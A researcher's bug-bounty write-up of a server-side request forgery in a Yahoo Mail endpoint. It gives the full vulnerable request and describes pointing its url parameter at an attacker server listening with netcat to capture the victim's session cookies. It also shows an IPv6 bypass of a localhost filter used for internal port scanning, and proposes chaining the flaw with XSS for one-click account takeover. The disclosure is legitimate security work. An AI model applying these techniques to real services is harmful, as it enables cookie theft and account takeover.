When Server Side Request Forgery combine with Cross Site Scripting

Summary

Hi, this is my third post about my Bug Hunting Journey. This finding is an interesting one, as it demonstrates how to chain different type of bugs in order to completely take over victim’s account. This finding allows me to take over your Yahoo account with just an click of a link. Sounds scary? Read on.

GET /d/xxxxxxxx/xxxxxxx?appid=YMail&crumb=kPun5CrTk1R&wssid=&clientId=mailsearch&timezone=Asia%2FHong_Kong&allowGoogleDocs=1&ymreqid=a5551380-75ce-13d6-1c16-c00001016500&url=http%3A%2F%2Fprod.mail.bf1.yahoo.com%2Fglasd%3f%2F%3FaccountIds%3D1%26timezone%3DAsia%252FHong_Kong%26mailboxid%3DBjJ-0j4oSqYSwadMXdzKCqzxjQ0gZZDkccM7CRStMSDerKbSfJwDAjhyiIZLOLd5xlNdGH4nkLovJSeSm65J69qU1w%26appid%3DYMail%26query%3Dis%253Aunread%26limit%3D50%26excludefolders%3DARCHIVE%26threads%3Dtrue%26vertical%3DMESSAGES%26order%3Dtime%2Bdesc%26cursor%3D49&listContentType=IMAGE

Take some time to read the request, and try to find something that is unusual in the request.

Not sure what you think it is unusual, but the parameter url look quite fun to me. Because it seems I can control the destination of the url, by changing http%3A%2F%2Fprod.mail.bf1.yahoo.com%2F to http%3Amysite.com, then I could make a Server Side Request Forgery.

So I did the test, make it points to my own server, I set up nc -lnvp 80 to listen for the traffic. The traffic went through and my Yahoo Cookies Header is included in the GET request from the Yahoo Server.

Let’s do a quick recap, first, set up a nc -lnvp 80 in my server, lets say my server ip address is 123.123.123.123

Then, make a get request to my server, by changing http%3A%2F%2Fprod.mail.bf1.yahoo.com%2F to http%3A123.123.123.123

Finally, a request from Yahoo Owned server has made a request to my 123.123.123.123, and included all of my yahoo header in the request.

So I can further confirm it is vulnerable to internal scanning as well, by changing the url to http://127.0.0.1, it failed, so i used another trick, http://::80, this is ipv6, and bypassed the 127.0.0.1 check, and then I was able to perform internal port scanning and other behavior as well.

Remember I said in the title that I could own your yahoo account by only one click? It is not a click bait, it is true, because when this attack combines with XSS, that recently discovered by klikki, then he can do more than just viewing the email of victim, he can actually takeover their account by forcing them to make the SSRF request to attacker owned server and get a copy of their cookies.